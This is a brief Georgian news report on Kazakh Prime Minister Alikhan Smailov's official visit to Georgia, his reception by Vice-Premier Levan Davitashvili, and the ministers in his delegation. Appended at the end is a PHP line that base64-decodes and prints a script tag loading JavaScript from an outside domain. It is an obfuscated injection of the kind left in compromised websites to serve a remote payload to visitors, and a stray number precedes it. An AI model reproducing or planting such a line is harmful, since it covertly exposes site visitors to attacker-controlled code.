celsiusi
ავერსი საქკაბელი

საქართველოს ოფიციალური ვიზიტით ყაზახეთის რესპუბლიკის პრემიერ-მინისტრი ალიხან სმაილოვი ეწვია.

როგორც საინფორმაციო სააგენტო Business Time-ს ეკონომიკისა და მდგრადი განვითარების სამინისტროდან აცნობეს,  საპატიო სტუმარს თბილისის საერთაშორისო აეროპორტში ვიცე-პრემიერი, ეკონომიკისა და მდგრადი განვითარების მინისტრი ლევან დავითაშვილი დახვდა.

ალიხან სმაილოვის თანმხლებ დელეგაციაში შედიან ყაზახეთის მთავრობის, მათ შორის, მრეწველობისა და ინფრასტრუქტურის, საგარეო საქმეთა, ვაჭრობისა და ინტეგრაციის, ენერგეტიკის, კულტურისა და სპორტის, ასევე სოფლის მეურნეობის სამინისტროების ხელმძღვანელი პირები.

ყაზახეთის დელეგაციის ვიზიტის ფარგლებში გაიმართება შეხვედრები საქართველოს პრემიერ- მინისტრთან და ხელისუფლების წარმომადგენლებთან.

399
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");